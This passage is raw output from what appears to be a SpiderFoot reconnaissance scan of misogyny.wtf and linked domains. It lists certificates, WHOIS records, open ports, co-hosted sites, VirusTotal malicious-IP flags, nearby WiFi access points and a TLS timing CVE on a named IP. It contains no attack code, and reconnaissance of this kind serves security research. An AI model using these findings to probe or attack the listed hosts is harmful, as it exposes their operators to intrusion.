u'MIIDxDCCA0ugAwIBAgISBDvB2owtjTxJyPs9RLXCh7Q6MAoGCCqGSM49BAMDMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJFMTAeFw0yMjA5MjAyMDA5MjBaFw0yMjEyMTkyMDA5MTlaMBkxFzAVBgNVBAMMDioubWlzb2d5bnkud3RmMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEnjWISQu3BfswOZEspMg9NyCjktDSEYJPx73jFp2+PT8UH8T9RADTIg4KFYAywjnauK40TxQBpRb3buswCsHM0qOCAlgwggJUMA4GA1UdDwEB/wQEAwIHgDAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwDAYDVR0TAQH/BAIwADAdBgNVHQ4EFgQUiCTfnCDiY1YjMALqNzGXRPyQZEYwHwYDVR0jBBgwFoAUWvPtK/w2wjd5uVIw6lRvz1XLLqwwVQYIKwYBBQUHAQEESTBHMCEGCCsGAQUFBzABhhVodHRwOi8vZTEuby5sZW5jci5vcmcwIgYIKwYBBQUHMAKGFmh0dHA6Ly9lMS5pLmxlbmNyLm9yZy8wJwYDVR0RBCAwHoIOKi5taXNvZ3lueS53dGaCDG1pc29neW55Lnd0ZjBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQUGCisGAQQB1nkCBAIEgfYEgfMA8QB2AEHIyrHfIkZKEMahOglCh15OMYsbA+vrS8do8JBilgb2AAABg1y74ewAAAQDAEcwRQIgS/ouObVKfh6ZlYa5s4rkgJ3NqxfXt0BPw5vtVCScEb0CIQD9RfvyoT7N6KLMNCkCcozrmcDKoCGZ96FbwXSnMvdCfwB3ACl5vvCeOTkh8FZzn2Old+W+V32cYAr4+U1dJlwlXceEAAABg1y74cAAAAQDAEgwRgIhAPwUlgvt/NnFKp5vUu7HBtBnuQHaVn1cki8Qdt/xXZA+AiEAtNEAmCESvCpUUvLmizN5aVhXxmdwXNo752cE5YQJe6gwCgYIKoZIzj0EAwMDZwAwZAIwDJ8CnqY/zTuFMitJlvIAWP1AZd65lLUR74ojDAfs9XUYBwckFefqi7Q2d3WD67A+AjAtPkNhVAx33Bf+TUXe062yNaIVLkUyJWjD95xT+Llpe4oOJ16OjJyYxa0zZwJ/mAk=', u'sha256': u'81c617224289d583511688ac79d71981676bc4671feb811a1401928a0e1512e2', u'type': u'cert'}, u'dns_names': [u'*.misogyny.wtf', u'misogyny.wtf'], u'tbs_sha256': u'8865b84af0efe8cd871b014a584c4494dee4348ccc8ca88bfe8e609be6531efc', u'not_before': u'2022-09-20T20:09:20Z', u'issuer': {u'pubkey_sha256': u'276fe8a8c4ec7611565bf9fce6dcace9be320c1b5bea27596b2204071ed04f10', u'name': u"C=US, O=Let's Encrypt, CN=E1"}}, {u'pubkey_sha256': u'1359a60d8dec09683a030b41be6af0751cc8495b7e6a5eed543f3e67ea3c3e34', u'revoked': False, u'not_after': u'2022-12-19T21:18:05Z', u'id': u'4202806186', u'cert': {u'data': u'MIIEfDCCA2SgAwIBAgIRAPTw+i+rKMN9DrACX58GsQwwDQYJKoZIhvcNAQELBQAwRjELMAkGA1UEBhMCVVMxIjAgBgNVBAoTGUdvb2dsZSBUcnVzdCBTZXJ2aWNlcyBMTEMxEzARBgNVBAMTCkdUUyBDQSAxUDUwHhcNMjIwOTIwMjExODA2WhcNMjIxMjE5MjExODA1WjAZMRcwFQYDVQQDDA4qLm1pc29neW55Lnd0ZjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKYXxgT74uBZrC6o07DMEnxo3LJ0VMsUlEgA1/ljqEMEV7jYoI0M7RUkpmZ3+oFkS2xBdbiXNm5b2mfiHxT/IoCUCGLfmcoDQwX6RiDSn9+Pp36KaT5hllGlk1TmkwkS7qAU5dGoyen600x7AQzwQ6IYr+pNLXNr/P4icP2LOAcaROqqc/dC/Sb/GRTDui6D36XoNUPDVmIgTxrWr53wEvpB56uFop5kkxs8V++Pxl/fQlDV8RdvMW+0bPseezRZNExpx9KTTtvZGnpt5pMqZBXtxDp1tlRfuKBCvtCiEXnEArUe1f/OJqwdNe47c6/gyDN0Hf2Kr83xovDnu+3S46sCAwEAAaOCAZAwggGMMA4GA1UdDwEB/wQEAwIFoDATBgNVHSUEDDAKBggrBgEFBQcDATAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBR2sIquN4rLNtSv8XY7JkuAKS7m9DAfBgNVHSMEGDAWgBTV/J4N3x7K3QiXl24rxV/FK/XsuDB4BggrBgEFBQcBAQRsMGowNQYIKwYBBQUHMAGGKWh0dHA6Ly9vY3NwLnBraS5nb29nL3MvZ3RzMXA1L2hMYXZ3el9SZ2dzMDEGCCsGAQUFBzAChiVodHRwOi8vcGtpLmdvb2cvcmVwby9jZXJ0cy9ndHMxcDUuZGVyMCcGA1UdEQQgMB6CDioubWlzb2d5bnkud3RmggxtaXNvZ3lueS53dGYwIQYDVR0gBBowGDAIBgZngQwBAgEwDAYKKwYBBAHWeQIFAzA8BgNVHR8ENTAzMDGgL6AthitodHRwOi8vY3Jscy5wa2kuZ29vZy9ndHMxcDUvdXR0MmZIdWtkNkUuY3JsMBMGCisGAQQB1nkCBAMBAf8EAgUAMA0GCSqGSIb3DQEBCwUAA4IBAQBSFGpOK3Vic2Qksop9EYgGwzJKmt6hEPSTkGqildHNsgSLlOxDDx2u8Da6Y+5MadOeLscNomWMjIgxI4aPX4ls89lrPqTObfE1z3F/WuqlLnHfOulMas3YpuLtccywUVLQ8uovUEge+3e5gNKx+fJj5ycZh/0xaldZL5bcQsIORn1h2KAlOwkxJWyZMkLuJaBOOEiogLLM7H01pO4mtrpVASxfBXltzRYAiODrR7V61HiGEn4/m32ia2zRFdOvzfMZiYq3Z+TS1AVCtKuGvummWhUFxQbEv/sjc4aoJQEwn7RYE4GP1VmEBMmh+xB5FAx5hNSdDIw7o8Apdy8J75sZ', u'sha256': u'966c4fc32756a6311ee52ac60b7e048a878007f9ee4f33ec45eb1f0391fa782f', u'type': u'precert'}, u'dns_names': [u'*.misogyny.wtf', u'misogyny.wtf'], u'tbs_sha256': u'fcaf693f5698707480c4defadce4170256c884fd95210accf96732b46604fa80', u'not_before': u'2022-09-20T21:18:06Z', u'issuer': {u'pubkey_sha256': u'f3559fd766dc2e51474007c996ec67cd9e85ae0fa827d3d663f5abc2eafcbe24', u'name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5'}}] misogyny.wtf 2022-12-18 00:08:22 Netblock Membership No RIPE 105 0 2 0 None 188.114.96.0/24 188.114.96.0 2022-12-18 00:05:16 Account on External Site No Account Finder 0 0 2 0 None YouTube User (Category: video) https://www.youtube.com/user/rasputain/about rasputain 2022-12-18 00:20:59 Netblock IPv6 Membership No Censys 0 0 2 0 None 2606:4700:3033::/48 2606:4700:3033::6815:1cf0 2022-12-18 00:02:39 Internet Name No SpiderFoot UI 74 0 0 0 None misogyny.wtf plague.fun,misogyny.wtf,rasputain.fr,zerotwo-best-waifu.online,137.117.157.128,20.195.209.219,4.228.83.86,40.113.112.131,51.103.210.236,20.224.2.213 2022-12-18 00:41:06 Malicious IP Address Yes VirusTotal 0 0 3 0 None VirusTotal [188.114.96.12] https://www.virustotal.com/en/ip-address/188.114.96.12/information/ 188.114.96.0/24 2022-12-18 00:03:10 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 03:d8:1f:4b:91:5b:d7:bf:2f:be:6e:27:8c:6c:60:f6:86:80 Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: May 6 17:46:04 2022 GMT Not After : Aug 4 17:46:03 2022 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:e7:c5:36:be:0c:28:37:d1:29:a1:d8:b4:65:57: 4a:67:4b:70:6f:de:ee:84:da:2e:65:a4:e6:b3:94: fc:d9:d6:02:89:2f:df:90:93:c2:8f:aa:c6:52:e4: e9:73:db:4f:c5:3b:ef:34:a6:e0:3b:5d:da:48:b4: 48:c5:11:62:d2 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: B1:C6:F3:C6:E5:48:6A:06:D6:8D:F2:AC:17:DA:BF:36:3F:CE:47:47 X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 41:C8:CA:B1:DF:22:46:4A:10:C6:A1:3A:09:42:87:5E: 4E:31:8B:1B:03:EB:EB:4B:C7:68:F0:90:62:96:06:F6 Timestamp : May 6 18:46:04.131 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:20:4B:23:C5:C7:DA:43:E1:C7:33:EC:22:06: 46:DB:FD:FD:6E:26:73:6A:42:93:5E:C8:48:8D:94:08: 6A:63:AE:77:02:21:00:D6:CF:1B:D9:F4:BE:72:8F:70: 75:12:34:0F:98:8E:AA:B3:70:0F:52:86:45:C8:38:29: 92:51:17:15:B4:60:9D Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 29:79:BE:F0:9E:39:39:21:F0:56:73:9F:63:A5:77:E5: BE:57:7D:9C:60:0A:F8:F9:4D:5D:26:5C:25:5D:C7:84 Timestamp : May 6 18:46:04.115 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:44:02:20:5F:DD:20:15:61:43:DF:28:01:F1:5E:3A: C3:BF:CE:49:95:FF:9D:AE:08:6F:25:34:45:2D:16:74: 18:DC:13:62:02:20:34:0B:4C:12:AB:EC:60:49:0F:FF: 04:29:D3:45:68:78:3C:53:F7:3B:DB:3A:7A:B9:46:20: D8:BF:54:89:19:52 Signature Algorithm: ecdsa-with-SHA384 30:65:02:31:00:8e:55:f4:4b:0b:ea:74:eb:af:1b:31:ca:b4: 2a:f1:bc:38:eb:cd:b1:48:26:0d:4a:05:25:d6:55:33:8b:2c: 28:82:d7:7f:f8:62:b8:02:0b:3d:6c:71:af:b2:08:1b:b2:02: 30:75:2c:e8:ea:b0:91:09:c9:a7:bb:57:4c:be:70:65:3b:e4: 37:15:35:ef:f2:2c:d0:1d:71:bf:99:f3:16:f5:53:23:cc:07: 1a:c8:33:71:82:63:73:c3:18:2c:1b:ac:94 2022-12-18 00:12:19 Phone Number No Phone Number Extractor 3 0 2 0 None +19854014545 Domain Name: misogyny.wtf Registry Domain ID: 6b6c85a5f2d349d2b2f4dead736615e8-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: https://www.namecheap.com/ Updated Date: 2022-10-26T19:30:44Z Creation Date: 2022-07-23T21:21:45Z Registry Expiry Date: 2023-07-23T21:21:45Z Registrar: NameCheap, Inc. Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Capital Region Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: IS Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:02:50Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. Domain name: misogyny.wtf Registry Domain ID: 6b6c85a5f2d349d2b2f4dead736615e8-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 0001-01-01T00:00:00.00Z Creation Date: 2022-07-23T21:21:45.57Z Registrar Registration Expiration Date: 2023-07-23T21:21:45.57Z Registrar: NAMECHEAP INC Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Reseller: NAMECHEAP INC Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: Registrant Name: Redacted for Privacy Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: Kalkofnsvegur 2 Registrant City: Reykjavik Registrant State/Province: Capital Region Registrant Postal Code: 101 Registrant Country: IS Registrant Phone: +354.4212434 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Registry Admin ID: Admin Name: Redacted for Privacy Admin Organization: Privacy service provided by Withheld for Privacy ehf Admin Street: Kalkofnsvegur 2 Admin City: Reykjavik Admin State/Province: Capital Region Admin Postal Code: 101 Admin Country: IS Admin Phone: +354.4212434 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Registry Tech ID: Tech Name: Redacted for Privacy Tech Organization: Privacy service provided by Withheld for Privacy ehf Tech Street: Kalkofnsvegur 2 Tech City: Reykjavik Tech State/Province: Capital Region Tech Postal Code: 101 Tech Country: IS Tech Phone: +354.4212434 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-17T18:02:52.31Z <<< For more information on Whois status codes, please visit https://icann.org/epp 2022-12-18 00:22:14 Open TCP Port No Censys 0 0 2 0 None 172.67.169.215:8443 172.67.169.215 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None 0b21a147-2b2b-4fde-92c4-f3d74ff2845b.id.repl.co 34.149.204.188 2022-12-18 00:21:17 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["77b2bfcd29419a0b-FRA"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Date": [""]} 188.114.96.1 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None House (Net ID: 00:02:2D:09:FC:0D) 37.7803446,-122.3906132 2022-12-18 00:07:25 SSL Certificate - Raw Data No Certificate Transparency 0 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 0f:0e:0e:28:f1:c6:cb:2f:ce:67:1d:a6:c8:b8:7a:b2 Signature Algorithm: ecdsa-with-SHA256 Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 Validity Not Before: Jan 17 00:00:00 2022 GMT Not After : Jan 17 23:59:59 2023 GMT Subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:ba:07:4b:f6:cd:75:2e:c1:25:8d:34:ab:3e:b4: aa:17:69:09:33:64:8d:12:4c:78:e7:a9:12:25:17: 21:a5:8d:70:39:49:dd:46:db:8d:c9:8d:58:c6:8b: dc:76:18:a8:1e:77:71:72:01:4a:e8:e3:da:d8:35: 79:51:6a:a1:4f ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Authority Key Identifier: keyid:A5:CE:37:EA:EB:B0:75:0E:94:67:88:B4:45:FA:D9:24:10:87:96:1F X509v3 Subject Key Identifier: 02:2A:86:DC:E3:73:06:B6:9C:5B:CA:6F:78:47:D8:90:1D:C4:4C:66 X509v3 Subject Alternative Name: DNS:rasputain.fr, DNS:*.rasputain.fr, DNS:sni.cloudflaressl.com X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 CRL Distribution Points: Full Name: URI:http://crl3.digicert.com/CloudflareIncECCCA-3.crl Full Name: URI:http://crl4.digicert.com/CloudflareIncECCCA-3.crl X509v3 Certificate Policies: Policy: 2.23.140.1.2.2 CPS: http://www.digicert.com/CPS Authority Information Access: OCSP - URI:http://ocsp.digicert.com CA Issuers - URI:http://cacerts.digicert.com/CloudflareIncECCCA-3.crt X509v3 Basic Constraints: critical CA:FALSE CT Precertificate Poison: critical NULL Signature Algorithm: ecdsa-with-SHA256 30:45:02:20:6f:73:02:9b:eb:82:c0:18:89:d7:54:b9:e8:bf: f7:f2:1a:58:cf:21:10:20:9e:f3:e5:90:50:67:fa:98:63:5a: 02:21:00:90:dd:98:e7:fb:4d:8d:1d:3e:1c:97:37:b2:0c:3e: fe:ac:a8:3e:a2:86:2b:2b:f1:cd:c9:00:51:71:fa:b7:4a rasputain.fr 2022-12-18 00:09:52 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.20:8080 188.114.96.0/24 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None ecuapichin--ecuapichin.repl.co 34.149.204.188 2022-12-18 00:12:16 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'NJ', u'country_tld': u'.us', u'ip': u'2606:4700:3032::ac43:be81', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/New_York', u'city': u'Newark', u'network': u'2606:4700:3030::/44', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv6', u'latitude': 40.7641, u'in_eu': False, u'utc_offset': u'-0500', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'CLOUDFLARENET', u'postal': u'07104', u'asn': u'AS13335', u'country': u'US', u'region': u'New Jersey', u'longitude': -74.1654, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} 2606:4700:3032::ac43:be81 2022-12-18 00:04:11 SSL Certificate - Issued by No SSL Certificate Analyzer 0 0 2 0 None C=US,O=Cloudflare\, Inc.,CN=Cloudflare Inc ECC CA-3 188.114.96.1 2022-12-18 00:18:29 Internet Name No DNS Resolver 0 0 3 0 None webmail.zerotwo-best-waifu.online [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://webmail.zerotwo-best-waifu.online', u'http_status': 200, u'plugins': {u'JQuery': {u'version': [u'3.5.0']}, u'Script': {u'string': [u'text/javascript']}, u'Country': {u'string': [u'ITALY'], u'module': [u'IT']}, u'Title': {u'string': [u'Not configured webmail']}, u'HTML5': {}, u'IP': {u'string': [u'81.88.48.102']}, u'X-Frame-Options': {u'string': [u'SAMEORIGIN']}}}, {}] 2022-12-18 00:26:57 Physical Location No MetaDefender 0 0 2 0 None San Francisco, United States 172.67.169.215 2022-12-18 00:08:38 Open TCP Port No LeakIX 0 0 1 0 None 20.195.209.219:80 20.195.209.219 2022-12-18 00:22:14 Open TCP Port No Censys 0 0 2 0 None 172.67.169.215:2082 172.67.169.215 2022-12-18 00:08:02 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.it plague.fun 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None Twist Studio (Net ID: 00:02:2D:07:96:23) 37.780462,-122.390564 2022-12-18 00:09:48 Co-Hosted Site No HackerTarget 0 0 2 0 None autodiscover.theerathornnft.com 172.67.147.230 2022-12-18 00:08:56 Open TCP Port No LeakIX 0 0 2 0 None 188.114.96.0:80 188.114.96.0 2022-12-18 00:21:17 Open TCP Port No Censys 0 0 2 0 None 188.114.96.1:80 188.114.96.1 2022-12-18 00:03:34 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lhcp3238.webapps.net 81.88.52.238 2022-12-18 00:24:06 Affiliate - Email Address No E-Mail Address Extractor 0 0 5 0 None z22lglbqy5igu1vav@registerprivateregistration.com Domain Name: SETUPDNS.NET Registry Domain ID: 1581585796_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.register.it Registrar URL: http://www.register.it Updated Date: 2022-01-13T08:14:30Z Creation Date: 2010-01-12T13:36:45Z Registry Expiry Date: 2023-01-12T13:36:45Z Registrar: Register SPA Registrar IANA ID: 168 Registrar Abuse Contact Email: abuse@register.it Registrar Abuse Contact Phone: +39.05520021555 Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Name Server: NS1.REGISTER.IT Name Server: NS2.REGISTER.IT DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of whois database: 2022-12-18T00:22:01Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration. TERMS OF USE: You are not authorized to access or query our Whois database through the use of electronic processes that are high-volume and automated except as reasonably necessary to register domain names or modify existing registrations; the Data in VeriSign Global Registry Services' ("VeriSign") Whois database is provided by VeriSign for information purposes only, and to assist persons in obtaining information about or related to a domain name registration record. VeriSign does not guarantee its accuracy. By submitting a Whois query, you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes that apply to VeriSign (or its computer systems). The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of VeriSign. You agree not to use electronic processes that are automated and high-volume to access or query the Whois database except as reasonably necessary to register domain names or modify existing registrations. VeriSign reserves the right to restrict your access to the Whois database in its sole discretion to ensure operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. Domain Name: SETUPDNS.NET Registry Domain ID: 1581585796_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.register.it Registrar URL: http://we.register.it Updated Date: 2022-02-14T00:00:00Z Creation Date: 2010-01-12T00:00:00Z Registrar Registration Expiration Date: 2023-01-12T00:00:00Z Registrar: REGISTER S.P.A. Registrar IANA ID: 168 Registrar Abuse Contact Email: abuse@register.it Registrar Abuse Contact Phone: +39.05520021555 Reseller: Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Registry Registrant ID: Registrant Name: Global Domain Privacy Registrant Organization: GLOBAL DOMAIN PRIVACY Registrant Street: Via Zanchi 22 Registrant City: Bergamo Registrant State/Province: BG Registrant Postal Code: 24126 Registrant Country: IT Registrant Phone: +39.353230400 Registrant Phone Ext: Registrant Fax: +39.353230312 Registrant Fax Ext: Registrant Email: z22lglbqy5igu1vav@registerprivateregistration.com Registry Admin ID: Admin Name: Global Domain Privacy Admin Organization: GLOBAL DOMAIN PRIVACY Admin Street: Via Zanchi 22 Admin City: Bergamo Admin State/Province: BG Admin Postal Code: 24126 Admin Country: IT Admin Phone: +39.353230400 Admin Phone Ext: Admin Fax: +39.353230312 Admin Fax Ext: Admin Email: z22lglbqy5igu1vav@registerprivateregistration.com Registry Tech ID: Tech Name: Global Domain Privacy Tech Organization: GLOBAL DOMAIN PRIVACY Tech Street: Via Zanchi 22 Tech City: Bergamo Tech State/Province: BG Tech Postal Code: 24126 Tech Country: IT Tech Phone: +39.353230400 Tech Phone Ext: Tech Fax: +39.353230312 Tech Fax Ext: Tech Email: private@register.it Name Server: NS1.REGISTER.IT Name Server: NS2.REGISTER.IT DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of whois database: 2022-12-18T00:22:21Z <<< For more information on Whois status codes, please visit https://icann.org/epp 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None webpersonaspichincha1--webpichinch.repl.co 34.149.204.188 2022-12-18 00:16:49 Malicious IP Address Yes VirusTotal 0 1 1 0 None VirusTotal [51.103.210.236] https://www.virustotal.com/en/ip-address/51.103.210.236/information/ 51.103.210.236 2022-12-18 00:11:20 Vulnerability - CVE Low Yes Tool - testssl.sh 0 1 2 0 None CVE-2013-0169 https://nvd.nist.gov/vuln/detail/CVE-2013-0169 Score: 2.6 Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. Per http://www.openssl.org/news/vulnerabilities.html: Fixed in OpenSSL 1.0.1d (Affected 1.0.1c, 1.0.1b, 1.0.1a, 1.0.1) Fixed in OpenSSL 1.0.0k (Affected 1.0.0j, 1.0.0i, 1.0.0g, 1.0.0f, 1.0.0e, 1.0.0d, 1.0.0c, 1.0.0b, 1.0.0a, 1.0.0) Fixed in OpenSSL 0.9.8y (Affected 0.9.8x, 0.9.8w, 0.9.8v, 0.9.8u, 0.9.8t, 0.9.8s, 0.9.8r, 0.9.8q, 0.9.8p, 0.9.8o, 0.9.8n, 0.9.8m, 0.9.8l, 0.9.8k, 0.9.8j, 0.9.8i, 0.9.8h, 0.9.8g, 0.9.8f, 0.9.8d, 0.9.8c, 0.9.8b, 0.9.8a, 0.9.8) Affected users should upgrade to OpenSSL 1.0.1e, 1.0.0k or 0.9.8y (The fix in 1.0.1d wasn't complete, so please use 1.0.1e or later) 188.114.97.1 2022-12-18 00:21:54 Open TCP Port No Censys 0 0 2 0 None 